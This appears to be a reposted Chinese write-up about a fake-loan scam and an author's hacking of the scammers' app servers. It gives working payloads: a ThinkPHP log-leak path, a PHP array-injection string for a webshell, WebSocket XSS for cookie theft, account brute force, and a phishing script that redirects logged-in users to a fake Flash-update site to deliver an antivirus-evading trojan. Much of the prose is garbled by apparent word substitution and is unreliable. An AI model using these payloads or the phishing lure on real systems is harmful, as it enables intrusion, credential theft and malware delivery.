该文章首发先知社区:https://xz.aliyun.com/t/10391
一.概述1.1某天,一位网上朋友见告笔者,他被骗了。被骗办法很独特,由于自己没钱以是选择贷款,在贷款过程中惨遭诱骗。1.2诱骗短信:
1.3诱骗过程(此处受害者用小辉代替):某日,小辉手机收到一条关于网络贷款的短信,恰逢月尾,捉襟见肘,小辉没忍住诱惑下载打开了app。注册好账号,填写好身份证号、手持、事情地点、家人信息等后申请了20000元贷款,但是迟迟没到账,小辉讯问客服得知:亲,这边申请贷款须要先缴纳688的VIP用度哦,缴纳后VIP用度会连同贷款金额一起打款到您的银行卡账户。小辉想了想,也不亏,于是将下个月房租开通了VIP报酬。小辉开通了VIP报酬,以为就能顺利贷款度过月尾,但是还是没收到贷款金额以及VIP用度。这次客服主动联系小辉,"您的信用额度不足,须要再刷流水3500元,请缴纳现金证明还款能力,缴纳后用度会连同贷款金额一起打款到您的银行卡账户"。小辉急了,眼看着下个月房租没着落了,咬咬牙找朋友借了3500元再次打给客服供应的银行卡号,心想,这次你总没什么借口了吧!
20000块钱,拿来吧你!
小辉已经想好贷款下来两万块如何吃喝玩乐了,857857~~~可是幸运女神还是没有照顾小辉,客服再次联系小辉,称已经审批成功即将下款,但是还须要支付3000的工本用度,且用度会连同贷款金额一起打款到银行卡账户,小辉傻眼了,紧接着,客服将后台天生的虚假的条约发送给了小辉。
小辉急了,自己就贷个款而已,却丢失了几千块钱还要上征信,关键贷款的钱还没得手!
小辉眼看着事情越闹越大,找到了我,经由小辉的一番描述,我查看了小辉手机上的贷款软件,无奈的见告小辉,你被骗了,钱要不回来了。小辉此刻也愣住了,流下来仇恨的泪水......
ps:以上仅为诱骗真实过程,所有细节旁白均为本人添油加醋。笔者也就此对市情上两款常见诱骗源码进行大略剖析并将其记录。
二.漏洞剖析2.1 第一套源码漏洞剖析2.1.1 Thinkphp日志泄露基于Thinkphp3.2.3开拓,前后台分离
默认开启Debug、导致泄露日志SQL信息、非常缓存
布局Payload:App/Runtime/Logs/21_10_16.log
获取泄露的admin表账号密码进入后台
2.1.2 数组可控导致RCE可上传文件名被直接带入数据包中
此处预测后端将文件名以数组的办法进行掌握(在拿到webshell后也证明了这个猜想是精确的)将可上传的文件名加入php,随后上传拿到Webshell查看对应配置文件,创造可上传后缀名是在数组当中,此处还可以利用插入闭合数组进行Getshell
payload:siteName=11111').phpinfo();//
来看看后端如何处理的,由于return array的缘故原由 必须加上字符串连接符"."
再上岸后台查看Payload是否实行
2.2 第二套源码漏洞剖析2.2.1 客服处Websocket-XSS
笔者能力有限,第二套诱骗贷款源码疑似一键搭建,均采取最新版宝塔+宝塔免费版WAF,在权限获取方面不敷,转而向客服处探求打破点前台:
找到客服入口,上传图片,会转到通过websocket上传的数据包修正websocket数据包,布局XSS
Cookie Get
三.客服系统掌握/PC掌握3.1掌握数据库
上岸mysql数据库查看诱骗嫌疑人上岸IP
杭州的电信基站动态IP,判断是家庭路由,暂无溯源代价。
3.2掌握客服系统
第一套诱骗源码的客服系统利用的是网上在线客服系统
在后台翻到了客服的后台上岸地址,前端显示账号存在or密码缺点,无奈账号没爆破成功。
随即笔者自己注册了该客服系统,通过adminid合营uid遍历SetCookie,越权成功,拿到客服账号。
中文账号==
爆破拿到密码
上岸客服后台全体诱骗话术链
与受害人谈天记录
3.3利用flash钓鱼在掌握诱骗app做事器权限后,笔者利用flash钓鱼试图掌握诱骗团伙个人PC。在后台上岸成功后跳转的文件插入跳转js 跳转到事先准备好的假的flash更新页面事先准备:免杀马一只 flash假域名一个(最好是包含有"flash"的字样)
<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请考试测验升级后访问改页面!");window.location.href="https://www.flashxxxx.com";</script>
效果:输入账号密码后登录,此时加载以上JavaScript。
点击"确认"跳转到事先假造的flash更新页面网站,勾引下载点击。
但是末了并未上线,通过日志创造诱骗团伙是上岸了该后台的,此处也算是一个小遗憾。
四.总结网贷诱骗类案件的范例特色是,犯罪嫌疑人以“无抵押无审核”为噱头招揽须要贷款的被害人,并以“账户冻结需做解冻”才能完成放款等名义收取担保金,又以保险费、激活费、做事费等名义再次收费。被害人为了收回之前缴纳的钱款,只能按照犯罪嫌疑人为被害人设计的全体流程,完成转款,导致被害人钱款被骗。一些急需用钱的个体经营者、消费不雅观念超前的上班族、大学生等人群是易受骗群体。诱骗者不仅仅将恶行之手伸向了喷鼻香港、台湾,乃至是国外......据剖析,这群诱骗团伙在巴西也进行了相同办法的诱骗,且利用的诱骗源码为以上剖析第一套源码。
